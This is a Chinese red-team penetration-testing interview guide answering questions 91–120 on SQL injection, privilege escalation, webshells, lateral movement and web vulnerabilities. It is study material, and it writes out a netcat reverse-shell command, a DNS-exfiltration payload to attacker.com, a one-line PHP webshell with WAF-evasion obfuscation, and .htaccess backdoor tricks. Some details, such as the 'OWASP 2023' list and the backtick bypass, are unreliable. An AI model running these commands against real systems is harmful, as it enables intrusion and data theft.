2025年渗透测试面试题总结-渗透测试红队面试四（题目+回答）

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

目录

渗透测试红队面试四

九十一、Android APP 逆向分析步骤

九十二、SQL注入分类

九十三、SQL注入预防

九十四、序列化与反序列化区别

九十五、常见中间件漏洞

九十六、内网渗透思路

九十七、OWASP Top10漏洞

九十八、正向代理与反向代理区别

九十九、Webshell工具对比

一百、正向Shell与反向Shell区别

一〇一、Windows提权方法

一〇二、Linux提权方法

一〇三、数据库分类

一〇四、PHP反序列化漏洞

一〇五、MySQL仅开放80端口的原因

一〇六、CMS目录扫描意义

一〇七、编辑器测试步骤

一〇八、审查上传点元素的意义

一〇九、CSRF、XSS、XXE区别与修复

一一〇、3389无法连接的可能原因

一一一、业务逻辑漏洞案例

一一二、上传脚本403的原因

一一三、用户名枚举利用

一一四、目标站禁止注册用户，找回密码处提示“用户不存在”的利用方式

一一五、突破SQL注入字符转义的绕过技术

一一六、存在.htaccess文件的Webshell利用场景

一一七、安全狗检测一句话木马的机制

一一八、提权时避免带空格目录的原因

一一九、利用防注入系统漏洞获取Shell的途径

一二十、CSRF、XSS、XXE的区别与修复方式

渗透测试红队面试四

九十一、Android APP 逆向分析步骤一般是怎么样的？
九十二、sql 注入 的分类？九十三、sql 注入的预防？九十四、序列化与反序列化的区别九十五、常见的中间件漏洞？九十六、内网渗透思路？九十七、OWASP Top10 有哪些漏洞九十八、正向代理和反向代理的区别九十九、蚁剑/菜刀/C 刀/冰蝎的相同与不相同之处一百、正向 SHELL 和反向 SHELL 的区别一百〇一、Windows 提权一百〇二、Windows 常用的提权方法一百〇三、Linux 提权有哪些方法一百〇四、数据库有哪些，关系型的和非关系型的分别是哪些一百〇五、PHP 反序列化一百〇六、为何一个 MYSQL 数据库的站，只有一个 80 端口开放？一百〇七、一个成熟并且相对安全的 CMS，渗透时扫描目录的意义？一百〇八、在某后台新闻编辑界面看到编辑器，应该先做什么？一百〇九、审查上传点的元素有什么意义？一百一十、CSRF、XSS 及 XXE 有什么区别，以及修复方式？一百一十一、3389 无法连接的几种情况一百一十二、说出至少三种业务逻辑漏洞，以及修复方式？一百一十三、目标站无防护，上传图片可以正常访问，上传脚本格式访问则 403，什么原因？一百一十四、目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用？一百一十五、如何突破注入时字符被转义？一百一十六、拿到一个 webshell 发现网站根目录下有.htaccess 文件，我们能做什么？一百一十七、安全狗会追踪变量，从而发现出是一句话木马吗？一百一十八、提权时选择可读写目录，为何尽量不用带空格的目录？一百一十九、如何利用这个防注入系统拿 shell？一百二十、CSRF 和 XSS 和 XXE 有什么区别，以及修复方式？

九十一、Android APP 逆向分析步骤

1. 准备阶段
   • 工具准备：使用Apktool反编译APK获取Smali代码，Jadx/Ghidra反编译为Java/C代码，Frida/Xposed进行动态注入。
   • 环境隔离：在虚拟机或沙盒中运行APP，防止恶意代码影响真实环境。
2. 静态分析
   • 逆向资源文件：查看AndroidManifest.xml 定位入口类、权限声明；分析res目录中的布局文件和字符串资源。
   • 代码审计：搜索敏感函数（如Runtime.exec() ）定位命令执行漏洞；检查加密算法实现（如硬编码密钥）。
3. 动态调试
   • 动态Hook：使用Frida Hook关键函数（如网络请求okhttp3.Callback）监控数据传输；Xposed模块修改APP逻辑。
   • 流量抓包：通过Burp Suite或Charles拦截HTTPS请求，分析API接口参数及加密方式。
4. 漏洞挖掘与利用
   • 逻辑漏洞：绕过身份验证流程（如修改返回值isVIP=true）；尝试SQL注入或XXE攻击后端接口。

---

九十二、SQL注入分类

1. 基于错误类型
   • 显错注入：通过数据库报错信息获取结构（如MySQL的floor(rand()*2)报错）。
   • 布尔盲注：通过页面返回差异推断数据（如1' AND 1=1 --与1' AND 1=2 --）。
2. 基于攻击手法
   • 联合查询注入：利用UNION SELECT拼接查询结果（需列数一致）。
   • 时间盲注：通过延时函数（如SLEEP(5)）判断条件真假。
3. 基于数据交互方式
   • GET/POST注入：通过URL参数或表单提交恶意输入。
   • 二次注入：将恶意数据存储后触发（如用户注册后查询时触发）。

---

九十三、SQL注入预防

1. 参数化查询
   • 使用预编译语句（如Java的PreparedStatement），避免拼接SQL字符串。
2. 输入过滤与验证
   • 白名单校验输入格式（如仅允许字母数字）；过滤特殊字符（'、"、#等）。
3. 最小权限原则
   • 数据库账户仅授予必要权限（如禁用FILE_PRIV、PROCESS权限）。

---

九十四、序列化与反序列化区别

1. 序列化：将对象转换为字节流（如Java的ObjectOutputStream），用于网络传输或持久化存储。
2. 反序列化：将字节流还原为对象，若未校验数据合法性，可能导致RCE（如Apache Commons Collections漏洞）。
3. 安全问题：攻击者构造恶意序列化数据触发漏洞（如PHP的unserialize()调用危险魔术方法）。

---

九十五、常见中间件漏洞

1. Apache Tomcat
   • CVE-2017-12615：PUT方法上传木马文件；弱口令爆破Manager后台。
2. Nginx
   • 错误配置导致目录遍历（如alias路径拼接漏洞）；解析漏洞（如.php.jpg 被当作PHP执行）。
3. WebLogic
   • 反序列化漏洞（如CVE-2019-2725）；T3协议未授权访问。

---

九十六、内网渗透思路

1. 信息收集
   • 扫描内网网段（10.0.0.0/8）、识别存活主机（arp-scan）、端口服务（nmap -sV）。
2. 横向移动
   • Pass-the-Hash：利用Mimikatz获取哈希值横向登录；SMB漏洞利用（如EternalBlue）。
3. 权限维持
   • 创建计划任务（schtasks）、隐藏后门（如Webshell）、SSH密钥植入。

---

九十七、OWASP Top10漏洞

2023版核心漏洞：

1. 注入（SQL、OS命令）；失效的身份认证（弱口令、会话固定）。
2. 敏感数据泄露（未加密传输）；XXE漏洞（XML外部实体注入）。
3. 安全配置错误（默认配置、冗余服务）；组件漏洞（第三方库过期）。

---

九十八、正向代理与反向代理区别

1. 正向代理
   • 客户端工具（如SS代理），隐藏客户端IP，突破访问限制（如访问Google）。
2. 反向代理
   • 服务端工具（如Nginx），隐藏服务器拓扑，实现负载均衡与缓存加速。

---

九十九、Webshell工具对比

工具	加密方式	协议支持	特点
蚁剑	AES/Base64	HTTP/HTTPS	开源，插件扩展性强
冰蝎	TLS动态密钥	WebSocket	流量加密，绕过WAF检测
菜刀	无加密（旧版）	HTTP	经典但易被识别

---

一百、正向Shell与反向Shell区别

1. 正向Shell：攻击机主动连接目标机（需目标开放端口），易被防火墙拦截。
2. 反向Shell：目标机主动连接攻击机（如nc 192.168.1.2 4444 -e /bin/sh），绕过入站规则。

---

一〇一、Windows提权方法

1. 漏洞利用
   • 通过whoami /priv查找可用的系统令牌（如SeImpersonatePrivilege），利用Print Spooler漏洞（CVE-2021-1675）。
2. 服务配置漏洞
   • 替换服务二进制文件（sc config修改路径指向恶意程序）。
3. DLL劫持
   • 将恶意DLL放置在高权限程序加载路径中。

---

一〇二、Linux提权方法

1. SUID滥用
   • 查找具有SUID位的程序（find / -perm -4000），如利用find -exec执行命令。
2. 内核漏洞
   • 利用脏牛（CVE-2016-5195）或Dirty Pipe（CVE-2022-0847）提权。
3. 定时任务
   • 写入恶意脚本到/etc/cron.hourly ，等待定时执行。

---

一〇三、数据库分类

1. 关系型
   • MySQL、Oracle、PostgreSQL（事务支持强，结构化查询）。
2. 非关系型
   • MongoDB（文档存储）、Redis（键值对）、Neo4j（图数据库）。

---

一〇四、PHP反序列化漏洞

1. 原理：未过滤的unserialize()调用触发魔术方法（如__destruct()、__wakeup()），执行恶意代码。
2. 利用链构造：寻找POP链（属性导向编程），串联多个类的方法触发漏洞。
3. 防御：禁用unserialize()或使用安全反序列化库（如PHP的__sleep()方法限制）。

---

一〇五、MySQL仅开放80端口的原因

1. 端口转发：Nginx反向代理将80端口请求转发到内网MySQL的3306端口。
2. Web应用集成：PHP通过本地Socket（如mysql.sock ）连接数据库，无需开放网络端口。

---

一〇六、CMS目录扫描意义

1. 敏感文件暴露：备份文件（.bak）、配置文件（config.php ）、管理员登录页（/admin）。
2. 历史漏洞利用：旧版本漏洞（如/install.php 未删除导致重安装）。

---

一〇七、编辑器测试步骤

1. 功能验证：尝试上传多种格式文件（如图片、文本），观察是否过滤.php或.jsp。
2. 绕过测试：修改文件头（GIF89a）、双写扩展名（shell.php.jpg ）、大小写混淆（shell.PhP）。

---

一〇八、审查上传点元素的意义

1. 客户端过滤绕过：删除前端JS验证（如accept=".jpg"），直接上传恶意文件。
2. 隐藏参数利用：发现未公开的参数（如type=php）控制文件处理逻辑。

---

一〇九、CSRF、XSS、XXE区别与修复

1. CSRF
   • 攻击：诱导用户点击链接触发非预期操作（如转账）。
   • 修复：Token验证、检查Referer头。
2. XSS
   • 攻击：注入恶意脚本窃取Cookie。
   • 修复：输入过滤、CSP策略。
3. XXE
   • 攻击：XML解析外部实体导致文件读取。
   • 修复：禁用DTD、使用JSON替代XML。

---

一一〇、3389无法连接的可能原因

1. 网络层：防火墙拦截（入站规则）、NAT未映射、目标机未开启Remote Desktop服务。
2. 系统层：端口修改（注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp的Port值）。

---

一一一、业务逻辑漏洞案例

1. 密码重置漏洞
   • 案例：未验证用户身份直接修改密码（如仅验证手机号归属）。
   • 修复：多因素认证（短信验证码+邮箱确认）。
2. 订单金额篡改
   • 案例：前端提交负数或0元订单。
   • 修复：后端校验价格一致性。

---

一一二、上传脚本403的原因

1. 服务端过滤：Web服务器（如Nginx）配置location ~ \.php$ { deny all; }阻止PHP执行。
2. 文件类型检查：通过MIME类型（Content-Type: image/jpeg）或扩展名黑名单拦截。

---

一一三、用户名枚举利用

1. 漏洞利用：通过响应差异（“用户不存在”提示）枚举有效用户名，用于精准钓鱼或密码爆破。
2. 防御：统一错误提示（如“重置链接已发送至您的邮箱”）。

一一四、目标站禁止注册用户，找回密码处提示“用户不存在”的利用方式

1. 用户名枚举漏洞
   • 原理：通过返回差异（“用户存在”与“用户不存在”）判断有效用户名。
   • 利用：使用工具（Burp Intruder）批量测试常见用户名（如admin、test），建立有效用户列表。
   • 后续攻击：针对有效用户发起密码爆破（密码喷洒攻击）或钓鱼邮件（伪装密码重置链接）。
2. 横向渗透入口
   • 信息收集：枚举管理员用户名后，结合其他漏洞（如弱口令）尝试登录后台。
3. 防御措施
   • 统一提示信息（如“重置链接已发送至您的邮箱”）；
   • 增加验证码或请求频率限制（防止自动化枚举）。

---

一一五、突破SQL注入字符转义的绕过技术

1. 编码绕过
   • 十六进制编码：将敏感字符转为十六进制（如'→0x27）。
   • URL编码：利用%20代替空格，%27代替单引号。
2. 二次注入
   • 存储型注入：先将恶意代码存入数据库（如用户简介字段），后续查询触发漏洞。
3. 非标准分隔符
   • 注释符分割：使用/**/替代空格（如UNION/**/SELECT）；
   • 反引号包裹：MySQL中利用反引号绕过关键字过滤（如SELECT `version()` ）。

---

一一六、存在.htaccess文件的Webshell利用场景

1. 修改服务器配置
   • 重定向与权限控制：强制所有PHP文件通过特定解析器执行（如AddHandler php-passthru .php）。
   • 解析漏洞利用：将图片后缀解析为PHP（如AddType application/x-httpd-php .jpg）。
2. 隐藏后门
   • 自定义错误页面：设置404页面指向恶意脚本（ErrorDocument 404 /shell.php ）。
   • IP白名单绕过：限制访问源IP，仅允许攻击者IP访问敏感路径。
3. 防御对抗
   • 监控.htaccess变动：使用文件完整性检查工具（如Tripwire）告警异常修改。

---

一一七、安全狗检测一句话木马的机制

1. 变量追踪原理
   • 静态特征检测：匹配eval($_POST['cmd'])等经典特征；
   • 动态行为监控：检测敏感函数调用链（如文件写入→代码执行）。
2. 绕过方法
   • 变量混淆：使用${"_G"."ET"}动态拼接变量名；
   • 加密传输：使用AES加密POST数据，Webshell内解密执行。
3. 防御升级
   • AI模型分析代码上下文语义，而非单纯依赖特征匹配。

---

一一八、提权时避免带空格目录的原因

1. 命令行解析风险
   • 路径截断：Windows命令行中空格可能被解析为参数分隔符（如C:\Program Files→C:\Program和Files）。
2. 路径引用问题
   • 需手动添加引号（如"C:\Program Files\xxx.exe" ），增加操作复杂度。
3. 历史漏洞案例
   • Unquoted Service Path漏洞：服务路径包含空格且未引号包裹时，可劫持执行权限（如C:\Program Files\Service\A.exe 优先执行C:\Program.exe ）。

---

一一九、利用防注入系统漏洞获取Shell的途径

1. 白名单绕过
   • 特定字段注入：绕过全局过滤，在未防护的字段（如文件上传描述）注入恶意代码。
2. 非标准协议注入
   • 利用DNS外带数据：通过LOAD_FILE(CONCAT('\\\\',(SELECT user()),'.attacker.com\\test')) 泄漏数据。
3. 复合漏洞利用
   • 结合文件上传：防注入系统未覆盖文件上传功能时，上传图片马并配合解析漏洞获取Shell。

---

一二十、CSRF、XSS、XXE的区别与修复方式

攻击类型	攻击原理	修复方式
CSRF	伪造用户身份执行非预期操作（如转账）	添加CSRF Token、校验Referer头、敏感操作二次认证。
XSS	注入恶意脚本窃取Cookie/篡改页面内容	输入输出过滤、CSP策略、HttpOnly Cookie。
XXE	利用XML解析加载外部实体导致文件读取/SSRF	禁用DTD、使用JSON替代XML、过滤<!ENTITY>。

扩展对比：

• CSRF依赖用户身份，攻击者需诱骗用户触发；
• XSS直接危害用户端，可持久化（存储型XSS）；
• XXE针对服务端解析器，常导致内部信息泄漏。